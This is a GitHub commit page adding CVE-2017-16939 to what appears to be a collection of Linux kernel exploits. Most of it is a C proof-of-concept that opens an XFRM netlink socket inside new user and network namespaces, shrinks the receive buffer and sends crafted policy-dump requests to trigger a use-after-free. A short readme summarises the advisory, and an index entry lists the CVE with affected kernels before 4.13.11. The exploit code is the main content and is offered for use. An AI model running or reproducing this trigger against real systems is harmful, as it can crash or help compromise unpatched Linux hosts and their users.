Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

Commit 8185498

Browse files
authored
Merge pull request #6 from CaledoniaProject/master
增加 CVE-2017-16939 
2 parents 64d3c55 + cee05e2 commit 8185498

File tree

3 files changed

+108
-0
lines changed

3 files changed

+108
-0
lines changed

‎2017/CVE-2017-16939/cve-2017-16939.c‎

Lines changed: 95 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,95 @@
1+
#include <string.h>
2+
#include <stdio.h>
3+
#include <stdlib.h>
4+
#include <asm/types.h>
5+
#include <sys/socket.h>
6+
#include <netinet/in.h>
7+
#include <arpa/inet.h>
8+
#include <linux/netlink.h>
9+
#include <linux/xfrm.h>
10+
#include <sched.h>
11+
#include <unistd.h>
12+
13+
#define BUFSIZE 2048
14+
15+
16+
int fd;
17+
struct sockaddr_nl addr;
18+
19+
struct msg_policy {
20+
struct nlmsghdr msg;
21+
char buf[BUFSIZE];
22+
};
23+
24+
void create_nl_socket(void)
25+
{
26+
fd = socket(PF_NETLINK,SOCK_RAW,NETLINK_XFRM);
27+
memset(&addr,0,sizeof(struct sockaddr_nl));
28+
addr.nl_family = AF_NETLINK;
29+
addr.nl_pid = 0; /* packet goes into the kernel */
30+
addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
31+
32+
}
33+
34+
void do_setsockopt(void)
35+
{
36+
int var =0x100;
37+
38+
setsockopt(fd,1,SO_RCVBUF,&var,sizeof(int));
39+
}
40+
41+
struct msg_policy *init_policy_dump(int size)
42+
{
43+
struct msg_policy *r;
44+
45+
r = malloc(sizeof(struct msg_policy));
46+
if(r == NULL) {
47+
perror("malloc");
48+
exit(-1);
49+
}
50+
memset(r,0,sizeof(struct msg_policy));
51+
52+
r->msg.nlmsg_len = 0x10;
53+
r->msg.nlmsg_type = XFRM_MSG_GETPOLICY;
54+
r->msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
55+
r->msg.nlmsg_seq = 0x1;
56+
r->msg.nlmsg_pid = 2;
57+
return r;
58+
59+
}
60+
int send_msg(int fd,struct nlmsghdr *msg)
61+
{
62+
int err;
63+
err = sendto(fd,(void *)msg,msg->nlmsg_len,0,(struct sockaddr*)&addr,sizeof(struct sockaddr_nl));
64+
if (err < 0) {
65+
perror("sendto");
66+
return -1;
67+
}
68+
return 0;
69+
70+
}
71+
72+
void create_ns(void)
73+
{
74+
if(unshare(CLONE_NEWUSER) != 0) {
75+
perror("unshare(CLONE_NEWUSER)");
76+
exit(1);
77+
}
78+
if(unshare(CLONE_NEWNET) != 0) {
79+
perror("unshared(CLONE_NEWUSER)");
80+
exit(2);
81+
}
82+
}
83+
int main(int argc,char **argv)
84+
{
85+
struct msg_policy *p;
86+
create_ns();
87+
88+
create_nl_socket();
89+
p = init_policy_dump(100);
90+
do_setsockopt();
91+
send_msg(fd,&p->msg);
92+
p = init_policy_dump(1000);
93+
send_msg(fd,&p->msg);
94+
return 0;
95+
}

‎2017/CVE-2017-16939/readme.md‎

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
### CVE-2017-16939
2+
3+
[来源: SSD Advisory – Linux Kernel XFRM Privilege Escalation](https://blogs.securiteam.com/index.php/archives/3535)
4+
5+
### 漏洞概要
6+
7+
The following advisory describes a Use-after-free vulnerability found in Linux kernel that can lead to privilege escalation. The vulnerability found in Netlink socket subsystem – XFRM.
8+
9+
Netlink is used to transfer information between the kernel and user-space processes. It consists of a standard sockets-based interface for user space processes and an internal kernel API for kernel modules.
10+

‎README.md‎

Lines changed: 3 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -14,6 +14,9 @@ linux-kernel-exploits
1414

1515
- [CVE-2017-1000112](./2017/CVE-2017-1000112) [a memory corruption due to UFO to non-UFO path switch]
1616

17+
- [CVE-2017-16939](./2017/CVE-2017-16939) [UAF in Netlink socket subsystem – XFRM]
18+
(Linux kernel before 4.13.11)
19+
1720
- [CVE-2017-7494](./2017/CVE-2017-7494) [Samba Remote execution]
1821
(Samba 3.5.0-4.6.4/4.5.10/4.4.14)
1922

0 commit comments

Comments
(0)

AltStyle によって変換されたページ (->オリジナル) /